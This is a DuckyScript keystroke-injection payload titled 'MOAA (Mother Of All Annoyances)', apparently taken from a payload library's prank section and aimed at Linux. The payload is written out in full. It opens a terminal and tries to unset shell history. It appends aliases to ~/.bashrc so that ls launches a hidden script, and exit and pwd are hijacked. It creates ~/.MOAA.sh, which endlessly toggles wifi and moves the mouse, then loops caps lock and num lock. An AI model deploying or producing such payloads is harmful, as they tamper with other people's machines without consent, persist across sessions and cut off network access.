Path: blob/master/payloads/library/prank/MOAA/payload.txt
4063 views
REM TITLE: MOAA (Mother Of All Annoyances)1REM AUTHOR: OSINTI4L (https://github.com/OSINTI4L)2REM TARGET OS: Linux (tested on Pop!_OS) | Dependencies: `xdotool` (for mouse movement) and `gnome environment` (for terminal window spawning).3REM DESCRIPTION: See README.md45ATTACKMODE HID6DELAY 10007CTRL ALT t8DELAY 300910REM Unsetting HISTFILE and adding aliases to shell environment:11STRINGLN unset HISTILE12STRINGLN cd ~ && cat >> .bashrc13STRINGLN alias ls="(~/./.MOAA.sh > /dev/null 2>&1 &)"14STRINGLN alias exit="(gnome-terminal)"15STRINGLN alias pwd="echo 'command not found'"16CTRL c1718REM Creating MOAA.sh Bash script to control wifi toggling and mouse movement:19STRINGLN_BASH20cat > .MOAA.sh21#!/bin/bash22while true23do24nmcli r wifi off25xdotool mousemove 300 026sleep 227xdotool mousemove 2000 20028sleep 229nmcli r wifi on30xdotool mousemove 25 10031sleep 232xdotool mousemove 1000 100033sleep 234done35END_STRINGLN36CTRL c3738REM Giving execution perms to MOAA.sh:39STRINGLN chmod +x ~/.MOAA.sh4041REM Closing terminal window:42ALT SPACE43UP44HOLD DOWN45DELAY 35046ENTER4748REM Beginning loop to toggle capslock, numlock, and move arrow keys up and down:49WHILE TRUE50CAPSLOCK51DELAY 100052NUMLOCK53DELAY 100054REPEAT 2 UP55DELAY 100056REPEAT 2 DOWN57DELAY 100058CAPSLOCK59DELAY 100060NUMLOCK61DELAY 100062END_WHILE636465